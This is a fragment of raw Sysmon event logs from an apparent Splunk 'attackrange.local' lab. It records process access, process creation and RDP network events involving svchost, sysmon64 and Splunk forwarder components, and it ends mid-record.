08:59:54.732{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047664Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:54.732{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047663Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:54.732{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047662Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:54.732{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047661Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:54.732{5EBD8912-7F2D-614D-0500-00000000FC01}408368C:\Windows\system32\csrss.exe{5EBD8912-880A-6151-E279-00000000FC01}612C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001047660Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:54.732{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-880A-6151-E279-00000000FC01}612C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001047659Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:54.717{5EBD8912-880A-6151-E279-00000000FC01}612C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000001047658Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:51.940{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local49200-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001047657Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:54.332{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F96F7E19E88F4983E7EAAD9A2C915F38,SHA256=90A67DCCBE666DBBDB311F0D04F40EE1244C1E2AD182F133F3844EFE2F1A144C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976207Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:51.543{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-60695-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000976206Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:51.302{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.3.202.198-65399-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000976205Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:54.167{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=37D07F7BB593B825DA9014A39A48DAE3,SHA256=881E8827C46D82403191A24A9D6A9AE053C29AE57638FE19D5A9AE3BF1EC7AC0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001047656Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:54.201{5EBD8912-880A-6151-E179-00000000FC01}54601056C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047655Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:54.047{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-880A-6151-E179-00000000FC01}5460C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047654Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:54.047{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047653Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:54.047{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047652Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:54.047{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047651Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:54.047{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047650Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:54.047{5EBD8912-7F2D-614D-0500-00000000FC01}408424C:\Windows\system32\csrss.exe{5EBD8912-880A-6151-E179-00000000FC01}5460C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001047649Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:54.047{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-880A-6151-E179-00000000FC01}5460C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001047648Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:54.033{5EBD8912-880A-6151-E179-00000000FC01}5460C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000976204Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:54.074{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5F971871E47904941D398C56CD47E462,SHA256=1CCC85B7E9FA6B4D85565326579494A70434CE89DD42F85B356906B05FED550D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001047680Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:55.617{5EBD8912-880B-6151-E379-00000000FC01}55523988C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x80000000000000001047679Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:53.736{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse162.55.235.26static.26.235.55.162.clients.your-server.de64187-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 10341000x80000000000000001047678Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:55.431{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-880B-6151-E379-00000000FC01}5552C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047677Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:55.431{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047676Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:55.431{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047675Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:55.431{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047674Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:55.431{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047673Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:55.431{5EBD8912-7F2D-614D-0500-00000000FC01}408368C:\Windows\system32\csrss.exe{5EBD8912-880B-6151-E379-00000000FC01}5552C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001047672Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:55.431{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-880B-6151-E379-00000000FC01}5552C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001047671Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:55.416{5EBD8912-880B-6151-E379-00000000FC01}5552C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001047670Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:55.363{5EBD8912-7F53-614D-7700-00000000FC01}2312NT 